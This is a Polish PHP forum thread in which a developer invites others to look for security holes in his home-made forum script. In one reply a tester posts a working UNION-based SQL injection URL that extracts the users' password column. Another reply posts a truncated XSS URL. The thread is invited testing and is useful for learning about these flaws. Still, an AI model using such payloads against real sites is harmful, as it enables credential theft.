Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> [skrypt] Skrypt forum
deniol13
post
Post #1





Grupa: Zarejestrowani
Postów: 190
Pomógł: 2
Dołączył: 30.11.2009

Ostrzeżenie: (10%)
X----


Gdzieś 7 czerwca rozpocząłem pracę nad własnym skryptem forum.
Skrypt ma budowę strukturalną w 95%, te 5% jest to klasa MySQL oraz klasa szablonów.
Cudów tam nie ma ale jak na 2tyg. pracy chyba nie jest źle.
Proszę szukać błędów, sql inj, xss etc.

Kod
http://zenb.hostil.pl/index.php


Hosting na razie jest jaki jest (troche wolny, niestabilny) ale jak skrypt będę rozwijać (mam taki zamiar) to się coś wybierze.

Pozdro
Go to the top of the page
+Quote Post
pedro84
post
Post #2





Grupa: Nieautoryzowani
Postów: 2 249
Pomógł: 305
Dołączył: 2.10.2006

Ostrzeżenie: (0%)
-----


Mam tylko jeden, więcej mi sie szukac nie chce. Przy rejestracji, jak podajesz dane i masz błąd, wszystko jest kasowane.

@down: Jakkolwiek to nazwiesz, jeśli nie ma ficzera to jest to błąd (IMG:style_emoticons/default/smile.gif)

Ten post edytował pedro84 21.06.2010, 16:02:16
Go to the top of the page
+Quote Post
deniol13
post
Post #3





Grupa: Zarejestrowani
Postów: 190
Pomógł: 2
Dołączył: 30.11.2009

Ostrzeżenie: (10%)
X----


chodzi ci o to zeby login zostal, email i te inne dane?
to to nie jest blad ;p
jedynie zapomnialem dodac, dzieki za uwage
Go to the top of the page
+Quote Post
SHiP
post
Post #4





Grupa: Zarejestrowani
Postów: 697
Pomógł: 47
Dołączył: 19.12.2003
Skąd: Lublin

Ostrzeżenie: (0%)
-----


Strona dziurawa (IMG:style_emoticons/default/winksmiley.jpg) . Dokładniej podatna na SQL Injection oraz Blind SQL Injection. Złamanie jej zajęło mi 5 minut (IMG:style_emoticons/default/biggrin.gif) . Hasło typu xxx111 nie jest zbyt najtrudniejsze do złamania ;]. Pierwszy z brzegu słownik MD5 mi rozgryzł hash(czemu nie dodajesz soli?).

A tu działający kod (IMG:style_emoticons/default/smile.gif)
Kod
http://zenb.hostil.pl/user.php?module=view&user=32%20AND%201=0%20UNION%20SELECT%201,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20users%20--


W polu Strona WWW widać jak na dłoni hasło administratora (IMG:style_emoticons/default/winksmiley.jpg) .

Pozdrawiam (IMG:style_emoticons/default/biggrin.gif)
Go to the top of the page
+Quote Post
deniol13
post
Post #5





Grupa: Zarejestrowani
Postów: 190
Pomógł: 2
Dołączył: 30.11.2009

Ostrzeżenie: (10%)
X----


nom brawo (IMG:style_emoticons/default/biggrin.gif)
dziwne, dałem mysql_real_escape_string bo tak sie ogolnie zabezpieczam przed sql inj, podaj mi na pw jak mozesz inne sql inj, blind sql (IMG:style_emoticons/default/smile.gif)
zeby sie jakos zabezpieczyc dodalem sprawdzanie czy get jest wartoscia numeryczna

zmiana adresu : zenb.tk lub zenb.xaa.pl

W changelog po zalogowaniu macie ostatnie zmiany ;p
Zapraszam do testowania (glownie sql inj )

ref
Go to the top of the page
+Quote Post
Kowol
post
Post #6





Grupa: Zarejestrowani
Postów: 23
Pomógł: 2
Dołączył: 12.03.2010

Ostrzeżenie: (0%)
-----


http://zenb.xaa.pl/pw.php?mode=new&use...);%3C/script%3E
Go to the top of the page
+Quote Post
deniol13
post
Post #7





Grupa: Zarejestrowani
Postów: 190
Pomógł: 2
Dołączył: 30.11.2009

Ostrzeżenie: (10%)
X----


poprawione, prosze o wiecej bo chce kiedys wypuscic skrypt a nie chce czegos pelnego xss, sql injection wypuscic a sam nie wylapie bledow

ref, dodalem ocenianie postow w niektorych forach
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 8.10.2025 - 14:12